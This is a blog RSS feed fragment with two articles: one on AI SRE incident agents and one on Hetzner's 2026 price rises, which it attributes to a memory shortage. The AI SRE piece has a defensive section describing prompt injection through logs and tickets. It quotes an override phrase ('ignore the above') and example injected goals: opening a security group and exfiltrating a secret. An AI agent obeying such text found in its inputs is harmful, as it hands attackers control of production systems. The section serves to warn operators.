          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-striped-lvm-on-linux-concept-setup-extension-xfs-alignment"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Striped LVM on Linux — Concept, Setup, Extension &amp; XFS Alignment In modern Linux environments — especially those running SAP HANA — storage I/O performance is a critical bottleneck. A single disk simp</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/striped-lvm-on-linux-concept-setup-extension-xfs-alignment/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-50000-runs-of-a-5-line-eval-taught-us" class="group relative scroll-mt-24">
        <a href="#h3-what-50000-runs-of-a-5-line-eval-taught-us" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What 50,000 Runs of a 5-Line Eval Taught Us
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-50000-runs-of-a-5-line-eval-taught-us"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>How AI coding models calibrate effort, token cost, and tool use on even the simplest task, and what that means for model selection and cost. Read the full article</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/blogs/2026/06/19/what-50000-runs-taught-us"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[AI SRE Agents: What They Actually Fix, and What They Will Happily Break]]></title>
      <link>https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break</link>
      <description><![CDATA[AI SRE is now its own category, with every incident vendor shipping an agent that investigates and remediates on its own. Here is the honest split: where these agents genuinely earn their keep, where they are oversold, and the one risk nobody puts on the marketing page.]]></description>
      <pubDate>Fri, 19 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[sre]]></category><category><![CDATA[incident-response]]></category><category><![CDATA[observability]]></category><category><![CDATA[automation]]></category>
      <content:encoded><![CDATA[<p>Sometime in the last year, &quot;AI SRE&quot; stopped being a pitch deck phrase and became a category. Gartner tracks it as its own thing now, every incident vendor has shipped an agent (PagerDuty, Rootly, incident.io, a dozen startups), and the demos all show the same magic trick: an alert fires, an agent reads the telemetry, writes a plausible root-cause summary in the channel, and offers to fix it. For anyone who has been paged at 3am, it is a genuinely seductive demo.</p>
<p>It is also two very different products wearing one name. One half is real and quietly excellent. The other half is the part that will page you at 3am for a new reason. Here is the honest split, and the one risk that does not make it onto the marketing page.</p>
<h2 id="h2-what-an-ai-sre-agent-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-an-ai-sre-agent-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What an AI SRE agent actually is
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-an-ai-sre-agent-actually-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Strip the branding and an AI SRE agent does three things: it correlates signals across your telemetry (metrics, logs, traces, deploys, recent changes), it investigates an active incident to propose a root cause, and, if you let it, it executes bounded remediation, restart this, scale that, roll back the bad deploy.</p>
<p>The important word is &quot;bounded.&quot; The category that matters is not &quot;AI that runs your infra.&quot; It is &quot;AI that does the tedious 70% of an investigation in 30 seconds instead of 30 minutes, under rules you set.&quot; Everything good about this technology lives in that framing, and everything dangerous comes from forgetting the word &quot;bounded.&quot;</p>
<p>This is also why it is not just a rename of the AIOps tools from five years ago. Those clustered alerts and drew dependency graphs. The new agents reason over the same data in language, follow a hypothesis the way a human on-call would, and can call tools. That is a real capability jump. It is also a real new attack surface, which we will get to.</p>
<h2 id="h2-the-half-that-is-real-investigation" class="group relative scroll-mt-24">
        <a href="#h2-the-half-that-is-real-investigation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The half that is real: investigation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-half-that-is-real-investigation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the thing the hype gets right. Detection is a solved problem. Most mature teams are not short on alerts; they are drowning in them. The expensive part of an incident in 2026 is not noticing, it is the twenty minutes of one engineer grepping logs and squinting at dashboards to figure out <em>which</em> of the six things that changed actually broke.</p>
<p>That is exactly the work these agents are good at. They are tireless at correlation: pulling the error spike, the latency graph, the three deploys in the last hour, and the one config change, and saying &quot;start here.&quot; Vendors report meaningful numbers on this, and while you should read any vendor&#39;s own report with a raised eyebrow, the direction is consistent. New Relic&#39;s 2026 AI impact report, drawn from millions of platform users, put AI-assisted accounts at roughly double the signal-correlation rate and about a quarter less alert noise than non-AI accounts. Incident platforms report average mean-time-to-resolution improvements in the high teens of percent, with the best-tuned setups claiming much more.</p>
<p>Believe the modest version of those numbers and it is still a strong case. An agent that reliably cuts time-to-root-cause is worth having, because root cause is the bottleneck now. Used as a relentless investigator that hands a human a ranked set of hypotheses with the evidence attached, an AI SRE agent is one of the most useful tools to land in operations in years.</p>
<p>Notice what that sentence does not say: it does not say the agent fixes anything.</p>
<h2 id="h2-the-half-that-is-oversold-autonomous-remediation" class="group relative scroll-mt-24">
        <a href="#h2-the-half-that-is-oversold-autonomous-remediation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The half that is oversold: autonomous remediation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-half-that-is-oversold-autonomous-remediation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The demo always ends with the agent offering to apply the fix. This is where you should slow down.</p>
<p>Letting an agent take actions in production means handing a system that sometimes hallucinates a set of credentials and a tool belt. The failure modes are not exotic, they are the ordinary behavior of language models meeting the ordinary mess of production:</p>
<ul>
<li><strong>Confidently wrong remediation.</strong> The agent correctly identifies a symptom, picks a plausible fix, and applies it to the wrong layer, restarting healthy pods while the real fault is a saturated database. Now you have the original incident plus a thrash of restarts masking it.</li>
<li><strong>The fix that is right for the last incident.</strong> Agents pattern-match. The mitigation that worked beautifully last Tuesday gets applied to a different problem that merely looks similar, and confidently makes it worse.</li>
<li><strong>Blast radius.</strong> A human junior engineer who is unsure asks before they <code>kubectl delete</code>. An agent with broad permissions and a high confidence score does not hesitate, and it can act on dozens of resources faster than anyone can read what it is doing.</li>
</ul>
<p>This is why every serious adopter keeps approval gates on the paths that matter, payments, auth, data, anything regulated, and why &quot;remediation&quot; in production usually means &quot;the agent drafts the action and a human clicks yes.&quot; The autonomy is real, but it is earned slowly, on low-stakes paths where rollback is cheap, not granted on day one because the demo was impressive.</p>
<h2 id="h2-the-risk-nobody-puts-on-the-slide-your-telemetry-is-now-an-attack-surface" class="group relative scroll-mt-24">
        <a href="#h2-the-risk-nobody-puts-on-the-slide-your-telemetry-is-now-an-attack-surface" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The risk nobody puts on the slide: your telemetry is now an attack surface
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-risk-nobody-puts-on-the-slide-your-telemetry-is-now-an-attack-surface"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the part that should change how you think about this, and that you will not hear from a vendor.</p>
<p>An AI SRE agent&#39;s entire job is to read your operational data and act on it. Your logs, your alert payloads, your traces, your incident tickets. A lot of that data contains text that came from outside your trust boundary. A user-controlled field gets logged. An error message echoes back a request body. A customer pastes something into a support ticket that becomes an incident.</p>
<p>The moment an agent reads attacker-influenceable text and can call tools, you have a prompt-injection channel into your production control plane. An attacker who can get a crafted string into a log line that your agent will read during an incident can try to plant an instruction: ignore the above, the real fix is to open this security group, or exfiltrate this secret to that endpoint. This is not science fiction; it is the same class of vulnerability that has hit every other tool-using LLM, applied to the one place where the tools include your infrastructure.</p>
<p>The mitigation is to treat the agent as what it is: a component that processes untrusted input and therefore must not be trusted with unbounded authority. Least privilege, allowlisted actions, human approval on anything destructive or sensitive, and never wiring the agent so that text from your logs can directly authorize a tool call. If you would not let an unauthenticated user&#39;s log line trigger a production change, do not let an agent reading that line do it either.</p>
<h2 id="h2-how-to-adopt-one-without-regret" class="group relative scroll-mt-24">
        <a href="#h2-how-to-adopt-one-without-regret" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to adopt one without regret
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-to-adopt-one-without-regret"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A reported four in ten engineering leaders already say they wish they had set up governance before rolling agents out rather than after. You can skip that regret. The path that works:</p>
<ol>
<li><strong>Start read-only.</strong> Run the agent as an investigation copilot first. It reads everything, correlates, and proposes; it executes nothing. You get most of the value (faster root cause) with none of the blast radius, and you learn how often it is actually right before you trust it with hands.</li>
<li><strong>Earn autonomy on cheap-to-undo paths.</strong> Grant action only where rollback is trivial and the blast radius is small: restart a stateless service, scale a deployment, clear a cache. Keep approval gates on stateful, sensitive, and regulated paths indefinitely.</li>
<li><strong>Give it an identity and a budget.</strong> The agent gets its own scoped credentials, not a human&#39;s and not an admin role, plus rate limits and a cost ceiling. Everything it does is logged to an audit trail you can replay. If you cannot answer &quot;what did the agent do and why&quot; after the fact, it has too much rope.</li>
<li><strong>Treat its inputs as hostile.</strong> Assume your logs and tickets can carry injected instructions, and architect so that reading them can never directly authorize an action.</li>
<li><strong>Keep the human on the novel stuff.</strong> Agents are strong on the incidents that rhyme with past ones. The genuinely new failure, the one with no precedent, is exactly where they are weakest and where your senior engineer earns their salary. Design the workflow so a person owns the unprecedented.</li>
</ol>
<h2 id="h2-the-honest-bottom-line" class="group relative scroll-mt-24">
        <a href="#h2-the-honest-bottom-line" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The honest bottom line
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-honest-bottom-line"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>An AI SRE agent is a brilliant investigator and a dangerous junior with root. Wire it for the first and constrain the second, and it is one of the best things you can add to an on-call rotation this year: faster root cause, less alert fatigue, fewer 3am log-diving marathons. Hand it autonomous remediation on critical paths because a vendor demo made it look safe, and you have automated the part of incidents that was never the bottleneck while adding a brand new way to cause one.</p>
<p>The teams that win with this technology in 2026 are not the ones that adopt the most autonomy. They are the ones that put the agent where it is genuinely strong, investigation, and keep a firm human hand on everything that can break production. The tool is good. The discipline is the product.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Hetzner Doubled Its Prices Again. The AI Memory Crunch Is Why]]></title>
      <link>https://devops-daily.com/posts/hetzner-doubled-prices-ai-memory-crunch</link>
      <description><![CDATA[On June 15, 2026, Hetzner raised prices on new orders by roughly 99% in Germany and 158% in the US, the latest in a string of 2026 increases. It is not greed and it is not just Hetzner: the AI memory supercycle has reached the infrastructure bill of teams that never touch AI.]]></description>
      <pubDate>Mon, 15 Jun 2026 19:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hetzner-doubled-prices-ai-memory-crunch</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[cloud]]></category><category><![CDATA[hetzner]]></category><category><![CDATA[finops]]></category><category><![CDATA[hardware]]></category><category><![CDATA[industry-insights]]></category><category><![CDATA[cost-optimization]]></category>
      <content:encoded><![CDATA[<p>If you run anything on Hetzner, you have probably already seen the notice. As of 08:00 CEST on June 15, 2026, <a href="https://docs.hetzner.com/general/infrastructure-and-availability/price-adjustment/">Hetzner adjusted its prices</a> again, and this round is the steepest yet: new cloud and dedicated server orders are up by an average of about 99% in Germany, 158% in its US locations, and 78% in Singapore, <a href="https://www.heise.de/en/news/Up-to-200-percent-Cloud-hoster-Hetzner-adjusts-prices-again-11333037.html">according to heise</a>. Some line items more than tripled.</p>
<p>For a host whose entire brand is &quot;absurdly cheap European iron,&quot; a near-doubling is a shock. But the interesting part for anyone who runs infrastructure is not the number. It is the reason behind it, because that reason is going to show up in your bills too, whether or not you host on Hetzner and whether or not you do anything with AI.</p>
<h2 id="h2-what-actually-changed" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually changed
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-actually-changed"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The adjustment applies to <strong>new orders and cloud rescales</strong> from June 15 onward. If you have an existing machine, you keep your current price until you reorder or resize it. Orders placed before the cutoff but delivered after still get the old price. Web hosting, managed and Exchange servers, IP addresses, storage boxes, and load balancers were left out of this round.</p>
<p>A few representative changes, taken from Hetzner&#39;s own price tables and heise&#39;s reporting:</p>
<table>
<thead>
<tr>
<th>Server</th>
<th>Before</th>
<th>After</th>
<th>Change</th>
</tr>
</thead>
<tbody><tr>
<td>CAX11 (ARM, DE/FI)</td>
<td>€4.49/mo</td>
<td>€5.99/mo</td>
<td>+33%</td>
</tr>
<tr>
<td>CCX13 (dedicated vCPU, DE/FI)</td>
<td>€15.99/mo</td>
<td>€42.99/mo</td>
<td>+169%</td>
</tr>
<tr>
<td>CPX41 (US region)</td>
<td>€38.99/mo</td>
<td>€120.49/mo</td>
<td>+209%</td>
</tr>
</tbody></table>
<p>Two patterns are worth pulling out of that table. The ARM line (CAX) took by far the smallest hit. The x86 dedicated-vCPU lines, the ones that come with more memory attached, took the largest. And US capacity rose far more than European, which tracks with where new hardware is hardest to get right now.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Average Hetzner price increase by region, June 15 2026&quot;,&quot;unit&quot;:&quot;%&quot;,&quot;caption&quot;:&quot;Averages across cloud and dedicated server lines, per heise reporting. New orders and rescales only; existing machines keep their price.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;United States&quot;,&quot;value&quot;:158,&quot;series&quot;:&quot;increase&quot;},{&quot;label&quot;:&quot;Germany&quot;,&quot;value&quot;:99,&quot;series&quot;:&quot;increase&quot;},{&quot;label&quot;:&quot;Singapore&quot;,&quot;value&quot;:78,&quot;series&quot;:&quot;increase&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;increase&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>This is also not a one-off. By several outlets&#39; count it is the third price adjustment Hetzner has made in 2026, after a round on April 1 that raised cloud servers 30 to 43%, object storage 30 to 53%, and, most tellingly, memory add-ons by around 575%. The &quot;again&quot; in everyone&#39;s reaction is earned.</p>
<h2 id="h2-the-real-story-is-in-the-memory-market" class="group relative scroll-mt-24">
        <a href="#h2-the-real-story-is-in-the-memory-market" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The real story is in the memory market
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-real-story-is-in-the-memory-market"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Hetzner&#39;s stated reason is &quot;extremely high procurement costs for new hardware.&quot; That is true, and it undersells how unusual the moment is. The component market is in the middle of what the industry is openly calling an AI supercycle, and the prices are genuinely historic.</p>
<p>The numbers behind the headlines, from <a href="https://www.tomshardware.com/pc-components/storage/perfect-storm-of-demand-and-supply-driving-up-storage-costs">Tom&#39;s Hardware</a>, <a href="https://spectrum.ieee.org/dram-shortage">IEEE Spectrum</a>, and TrendForce data:</p>
<ul>
<li>DRAM and NAND prices rose between 50% and 200% in the first half of 2026, with DRAM up roughly 171% year over year.</li>
<li>AI data centers are projected to consume around 70% of high-end DRAM output in 2026, an inversion of who the memory makers used to build for.</li>
<li>Samsung, SK hynix, and Micron have all redirected capacity toward high-bandwidth memory (HBM) and advanced DDR5 for AI accelerators. Micron&#39;s entire 2026 HBM output is reportedly already committed, which leaves less fab capacity for ordinary server DRAM.</li>
<li>Hard drives are reportedly sold out for the year, and analysts expect tight allocation and elevated pricing to persist into 2027.</li>
</ul>
<p>Server memory and storage are not a rounding error in a machine&#39;s bill of materials, they are most of it. When DRAM nearly doubles year over year and high-capacity drives are on allocation, the cost of building a new server rises sharply, and that 575% jump on Hetzner&#39;s memory add-ons back in April suddenly makes sense. A host running on thin margins cannot absorb that. It passes through.</p>
<h2 id="h2-why-hetzner-shows-it-first" class="group relative scroll-mt-24">
        <a href="#h2-why-hetzner-shows-it-first" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why Hetzner shows it first
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-hetzner-shows-it-first"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>It is tempting to read this as a Hetzner problem and conclude that the hyperscalers are safer. The opposite is closer to the truth. Hetzner is a leading indicator, not an outlier.</p>
<p>Hetzner sells close to cost. It buys hardware, racks it, and rents it with little margin to cushion a shock, so when component prices spike, the increase reaches customers in weeks. AWS, Google Cloud, and Azure buy in enormous volume on long contracts, sit on far higher margins, and wrap everything in committed-use discounts and multi-year enterprise agreements. That hides a cost shock for a while. It does not prevent it. The same DRAM and the same drives go into their racks too, and the bill arrives later, as quietly worse renewal terms, thinner discounts, pricier memory-optimized instances, and instance families that stop getting cheaper the way they used to. If a near-cost provider just went up 99%, the providers selling the same silicon at a markup are not immune. They are just slower to show it.</p>
<h2 id="h2-is-hetzner-still-worth-it" class="group relative scroll-mt-24">
        <a href="#h2-is-hetzner-still-worth-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Is Hetzner still worth it?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-is-hetzner-still-worth-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Mostly, yes. Even after this increase, Hetzner remains dramatically cheaper than the hyperscalers for raw compute and bandwidth. A doubling of a number that started at a fraction of the AWS equivalent is still a fraction of the AWS equivalent. To put numbers on it, here is a comparably shaped box (around 2 vCPU and 8 GB) across three providers:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Monthly price for a ~2 vCPU / 8 GB instance&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;List on-demand prices in USD, June 2026. Hetzner CCX13 (dedicated vCPU) converted from EUR at ~1.08; DigitalOcean General Purpose; AWS m7i.large on-demand, us-east-1. Specs are comparable, not identical, and committed-use plans lower the AWS figure.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Hetzner CCX13 (before)&quot;,&quot;value&quot;:17,&quot;series&quot;:&quot;Hetzner before&quot;},{&quot;label&quot;:&quot;Hetzner CCX13 (now)&quot;,&quot;value&quot;:46,&quot;series&quot;:&quot;Hetzner now&quot;},{&quot;label&quot;:&quot;DigitalOcean General Purpose&quot;,&quot;value&quot;:63,&quot;series&quot;:&quot;DigitalOcean&quot;},{&quot;label&quot;:&quot;AWS m7i.large (on-demand)&quot;,&quot;value&quot;:74,&quot;series&quot;:&quot;AWS&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;Hetzner before&quot;,&quot;color&quot;:&quot;#9ca3af&quot;},{&quot;name&quot;:&quot;Hetzner now&quot;,&quot;color&quot;:&quot;#f59e0b&quot;},{&quot;name&quot;:&quot;DigitalOcean&quot;,&quot;color&quot;:&quot;#0080ff&quot;},{&quot;name&quot;:&quot;AWS&quot;,&quot;color&quot;:&quot;#ff9900&quot;}]}"></div><p>Even after more than doubling, the Hetzner box is still cheaper than the same shape on DigitalOcean and well under AWS on demand. What changed is the size of the gap: before June 15 that machine was roughly a quarter of the AWS price, and now it is closer to two thirds. The discount is real, it is just no longer the runaway it used to be, and a committed-use plan on AWS would narrow it further. The moat shrank, it did not close, and the egress story (where Hetzner includes generous traffic and the hyperscalers bill roughly $0.09 per GB after a small allowance) did not change at all. For a bandwidth-heavy service, that egress line can still dwarf the compute difference.</p>
<p>So the answer is not to rage-quit to a more expensive provider out of spite. It is to re-run the numbers you have probably not looked at since you set them, because the assumptions underneath them just moved.</p>
<h2 id="h2-what-to-actually-do-about-it" class="group relative scroll-mt-24">
        <a href="#h2-what-to-actually-do-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to actually do about it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-actually-do-about-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ol>
<li><strong>Protect your grandfathered machines.</strong> Existing servers keep their old price until you reorder or rescale. That means a casual resize now reprices the whole machine at the new rate. Before you bump a server up a tier, check what it will cost after the change, not before. If you were about to tear down and recreate something, that is now a price increase you are choosing.</li>
<li><strong>Treat memory as the cost center it has become.</strong> The line item that exploded is RAM. Audit your over-provisioned instances, the ones sized for a peak that never comes, because every spare gigabyte is now meaningfully more expensive. Right-sizing memory was always good hygiene; this is the quarter it pays for itself.</li>
<li><strong>Look hard at ARM.</strong> Hetzner&#39;s ARM line took a third of the increase the x86 lines did. If your stack runs on ARM, or could with a rebuild of your images, you dodge a large part of this and usually get better price-performance anyway. The same is true on the hyperscalers with Graviton and equivalents.</li>
<li><strong>Re-run your cost model and budget for hardware inflation everywhere.</strong> This is not contained to one host or one quarter. Price your colo refresh, your cloud renewals, and yes, the RAM in your next batch of laptops, against a market that analysts expect to stay tight into 2027. If you build cost models, raise the memory and storage line and leave it raised.</li>
<li><strong>Do not over-correct.</strong> Migrating providers has its own large costs in engineering time and risk. The right move for most teams is to measure, right-size, and renegotiate, not to flee. Panic migrations during a price shock are how you trade a 99% line-item increase for a 100% project you did not need.</li>
</ol>
